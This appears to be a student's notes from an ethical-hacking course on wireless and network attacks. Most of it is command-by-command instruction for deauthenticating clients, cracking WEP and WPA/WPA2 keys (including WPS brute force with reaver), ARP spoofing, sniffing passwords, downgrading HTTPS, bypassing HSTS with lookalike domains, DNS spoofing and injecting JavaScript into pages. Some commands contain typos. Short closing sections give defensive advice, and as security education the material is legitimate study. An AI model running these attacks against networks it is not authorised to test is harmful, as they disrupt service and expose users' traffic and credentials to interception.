Network Hacking

Intro

  1. Pre-connection attacks

  2. gaining access

  3. Post-connection attacks

What is a MAC Address?

  • Media Access Control

    • Permanent

    • Physical

    • Unique

  • Assigned by manufacturer

Why Change the MAC Address?

  • Increase anonymity

  • Impersonate other devices

  • Bypass filters

Changing the MAC Address

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:11:22:33:44:55

Wireless Modes

iwconfig
ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
iwconfig

Pre-Connection Attacks

Packet Sniffing

Using airodump-ng

  • Part of the aircrack-ng suit

  • Airodump-ng is a packet sniffer

  • Used to capture all packets within range

  • Display detailed info about networks around us

  • Connected clients etc.

airodump-ng [MonitorModeInterface]

WiFi Bands

  • Decides the frequency range that can be used

  • Determines the channels that can be used

  • Clients need to support band used by router to communicate with it.

  • Data can be sniffed from a certain band if the wireless adapter used supports that band

  • Most common wifi bands are:

    • a - uses 5Ghz frequency only

    • b, g - uses 2.4Ghz frequency only

    • n - uses 5 and 2.4 Ghz

    • ac - uses frequencies lower than 6 Ghz

airodump-ng --band a mon0
airodump-ng --band abg mon0

Targeted Packet Sniffing

airodump-ng --bssid F8:23:B2:B9:50:A8 --channel 2 --write test mon0

Deauthentication Attack

  • Disconnect any client from any network

    • Works on encrypted networks (WEP, WPA, & WPA2)

    • No need to know the network key

    • No need to connect to the network

aireplay-ng --dauth [#DeauthPackets] -a [NetworkMac] -c [TargetMac] [Interface]

Gaining Access - WEP Cracking

Theory Behind Cracking WEP Encryption

  • Wired Equivalent Privacy

  • Old encryption

  • Uses an algorithm called RC4

  • Still used in some networks

  • Can be cracked easily

WEP Cracking

  • Client encrypts data using a key

  • Encrypted packet sent in the air

  • Router decrypts packet using the key

  • Each packet is encrypted using a unique key stream

  • Random initialization vector (IV) is used to geenrate the keys streams

  • The IV is only 24 bits

  • IV + Key (Password ) = key stream

  • IV is too small (only 24 bits)

  • IV is sent in plain text

Result:

  • IVs will repeat on busy networks

  • This makes WEP vulnerable to statistical attacks

  • Repeated IVs can be used to determine the key stream

  • and break the encryption

WEP Cracking Basics

Conclusion:

  • To crack WEP we need to:

    1. capture a large number of packets/IVs - using airodump-ng

    2. Analyse the captured IVs and crack the key - using aircrack-ng

airodump-ng --bssid 00:11:22:33:44:55 --channel 1 --write basic_wep mon0
aircrack-ng basic_wep-01.cap
# Take the key found in brackets [ 41:73:32:33:70 ] or whatever and connect to wifi using the key minus the colons

Fake Authentication Attack

Problem:

  • If network is not busy

  • It would take some time to capture enough IVs

Solution:

  • Force the AP to generate new IVs

Problem:

  • APs only communicate with connected clients.

    • We cant communicate with it

    • We cant even start the attack

Solution:

  • Associate with the AP before launcing the attack

airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0

ARP Request Replay Attack

  • Wait for an ARP packet

  • Capture it, and replay it (retransmit it)

  • THis causes the AP to produce another packet with net IV

  • Keep doing this till we have enough IVs to crack the key

airodump-ng --bssid 00:11:22:33:44:55 --channel 6 --write arpreplay mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aireplay-ng --arpreplay -b [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aireplay-ng --fakeauth 0 -a [targetAPMac] -h [MyMacAddressFirst8DigitsofUnspec] mon0
aircrack-ng arpreplay-01.cap

Gaining Access - WPA/WPA2 Cracking

Intro

  • Both can be cracked using the same methods

  • Made to address the issues in WEP

  • Much more secure

  • Each packet is encrypted using a unique temporary key

  • Packets contain no useful information

  • WPS is a feature that can be used with WPA & WPA2

  • Allows client to connect without the password

  • Authentication is done using an 8 digit pin

    • 8 digits is very small

    • We can try all possible pins in relatively short time

    • Then the WPS pin can be used to compute the actual password

  • PS. this only works if the router is configured not to use PBC (Push Button Authentication)

Hacking WPA & WPA2 Without a Wordlist

# Discover WPS networks
wash --interface mon0

# Run reaver
reaver -bssid 00:11:22:33:44:55 --channel 1 --interface mon0 -vvv --no-associate

# Then do the auth attack
airplay-ng --fakeauth 30 -a [targetRouterMAC] -h [myMACAddress] mon0

Capturing the Handshake

  • WPA fixed all weaknesses in WEP

  • Packets contain no useful data

  • Only packets that can aid with the cracking process are the handshake packets

    • These are 4 packets sent when a client connects to the network

# Run airodump as usual to get the BSSID and channel
# Then run airodump again
airodmp-ng --bssid 00:11:22:33:44:55 --channel 1 --write wpa_handshake mon0
# Wait for a device to connect or do a deauth attack to disconnect a client to get it to connect again to capture handshake packets
aireplay-ng --deauth 4 -a 00:11:22:33:44:55 -c [clientsMACAddress] mon0

Creating a Wordlist

  • The handshake does not contain data that helps recover the key

  • It contains data that can be used to check if a key is valid or not

Crunch can be used to create a wordlist

Cracking WPA & WPA2 Using a Wordlist Attack

aircrack-ng wpa_handshake-01.cap -w test.txt

Gaining Access - Security

Securing Your Network From Hackers

Now that we know how to test the security of all known wireless encryptions (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks as we know all the weaknesses that can be used by hackers to crack these encryptions.

So lets have a look on each of these encryptions one by one:

  1. WEP: WEP is an old encryption, and its really weak, as we seen in the course there are a number of methods that can be used to crack this encryption regardless of the strength of the password and even if there is nobody connected to the network. These attacks are possible because of the way WEP works, we discussed the weakness of WEP and how it can be used to crack it, some of these methods even allow you to crack the key in a few minutes.

  2. WPA/WPA2: WPA and WPA2 are very similar, the only difference between them is the algorithm used to encrypt the information but both encryptions work in the same way. WPA/WPA2 can be cracked in two ways

    1. If WPS feature is enabled then there is a high chance of obtaining the key regardless of its complexity, this can be done by exploiting a weakness in the WPS feature. WPS is used to allow users to connect to their wireless network without entering the key, this is done by pressing a WPS button on both the router and the device that they want to connect, the authentication works using an eight digit pin, hackers can brute force this pin in relatively short time (in an average of 10 hours), once they get the right pin they can use a tool called reaver to reverse engineer the pin and get the key, this is all possible due to the fact that the WPS feature uses an easy pin (only 8 characters and only contains digits), so its not a weakness in WPA/WPA2, its a weakness in a feature that can be enabled on routers that use WPA/WPA2 which can be exploited to get the actual WPA/WPA2 key.

    2. If WPS is not enabled, then the only way to crack WPA/WPA2 is using a dictionary attack, in this attack a list of passwords (dictionary) is compared against a file (handshake file) to check if any of the passwords is the actual key for the network, so if the password does not exist in the wordlist then the attacker will not be able to find the password.

Conclusion:

  1. Do not use WEP encryption, as we seen how easy it is to crack it regardless of the complexity of the password and even if there is nobody connected to the network.

  2. Use WPA2 with a complex password, make sure the password contains small letters, capital letters, symbols and numbers and;

  3. Ensure that the WPS feature is disabled as it can be used to crack your complex WPA2 key by brute-forcing the easy WPS pin.

Post Connection Attacks - Information Gathering

  • Discover all devices on the network

  • Display their

    • IP Address

    • MAC Address

    • OS

    • Open ports

    • Running services

    • Etc.

netdiscover -r 10.0.2.1/24

Network Mapping

  • HUGE security scanner

  • From an IP/IP range it can discover

    • Open ports

    • Running services

    • Operating system

    • Connected clients

    • Etc.

# You can also use the tool Zenmap
nmap -T4 -A -v 192.168.1.1/24
nmap -T4 -F 192.168.1.1/24
nmap -sV -T4 -O -F --version-light 192.168.1.1/24

Post Connection Attacks - MiTM

ARP Poisoning

  • Address Resolution Protocol

  • Simple protocol used to map IP Addresses of a machine to its MAC Address

Why ARP spoofing is possible

  1. Client accept responses even if they did not send a request

  2. Clients trust responses without any form or verification

Intercepting Network Traffic

Arpspoof

  • arpspoof tool to run arp spoofing attacks

  • Simple and reliable

  • Ported to most operating systems including Android and iOS

  • Usage is always the same

Usage:

  • arpspoof -i [interface] -t [clientIP] [gatewayIP]

  • arpspoof -i [interface] -t [gatewayIP] [clientIP]

# Enable ip forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

Bettercap Basics

  • Framework to run network attacks

  • Can be used to

    • ARP Spoof targets (redirect the flow of packets)

    • Sniff data (urls, usernam passwords)

    • Bypass HTTPS

    • Redirect domain requests (DNS spoofing)

    • Inject code into loaded pages

    • And more

  • usage: bettercap -iface [interface]

net.probe on
net.show

ARP Spoofing using Bettercap

set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on

Spying on Network Devices (Capturing Passwords, etc.)

net.sniff on
# go to http://vulnweb.com on the target

Creating Custom Spoofing Script

bettercap -iface eth0 -caplet spoof.cap

Bypass HTTPS

Problem:

  • Data in HTTP is sent as plain text

  • A MITM can read and edit requests and responses

  • Not secure

Solution:

  • Use HTTPS

  • HTTPS is an adaptation of HTTP

  • Encrypt HTTP using TLS or SSL

Problem:

  • Most websites use HTTPS

  • Data sniffed will be encrypted

Solution:

  • Downgrade HTTPS to HTTP

hstshijack/hstshijack

Bypassing HSTS

HSTS

  • HTTP Strict Transport Security

  • Used by Facebook, Twitter and few other famous websites

Problem:

  • Modern browsers are hard-coded to only load a list of HSTS websites over https

Solution:

  • Trick the browser into loading a different website

  • Replace all links for HSTS websites with similar links

Ex.

  • facebook.com -> facebook.corn

  • twitter.com -> twiter.com

# modify the hstshijack.cap file

Bypassing HSTS Recap

Examples

Hacker Setup

Firefox

Chrome

HTTP HTTPS Preloaded HSTS

vulnweb.com linkedin.com, winzip.com, stackoverflow.com, google.ie, netflix.com twitter.com, facebook.com, github.com

Bettercap zSec custom Kali + Bettercap + HSTShijack zSec custom Kali + Bettercap + HSTShijack

X X X

X Website needs to be included in the HSTSHijack caplet Works if Secure DNS is disabled

DNS Spoofing

bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set dns.spoof.domains zsecurity.org,*.zsecurity.org
dns.spoof on

Injecting Javascript Code

Bettercap Code Injection

  • Inject Javascript code in loaded pages

  • Code gets executed

  • This can be used to

    • Replace links

    • Replace images

    • Insert html elements

    • Hook target browser to exploitation frameworks

    • and more

Bettercap Web Interface

  • Web interface

    • More user-friendly

    • Requires more resources

    • And more modules

bettercap -iface eth0
ui.update
http-ui

# credentials
user, pass

Wireshark

  • Wireshark is a network protocol analyser

  • Designed to help network administrators to keep track of whats happening in their network

  • How it works

    • Logs packets taht flow through selected interface

    • Analyse all the packets

  • WHen we are the MITM, wireshark can be used to sniff and analyse traffic sent/received by targets

Detection & Security

ARP Spoofing

Why ARP Spoofing is possible:

  1. clients accept responses even if they did not send a request

  2. Clients trust response without any form of verification

  3. Use xarp on Windows and Linux to detect arp poisoning

MITM Attacks

Detection:

  1. Analysing arp tables

  2. Using tools such as Xarp

  3. Using wireshark

Problems:

  1. Detection is not the same as prevention

  2. Only works for ARP Spoofing.

Solution:

  • Encrypt traffic

  • HTTPS everywhere plugin

  • Using a VPN

Benefits of VPN:

  • Extra layer of encryption

  • More privacy & anonymity

  • Bypass censorship

  • Protection from hackers

Notes:

  • Use reputable VPN

  • Avoid free providers

  • Make sure they keep no logs

  • Use HTTPS everywhere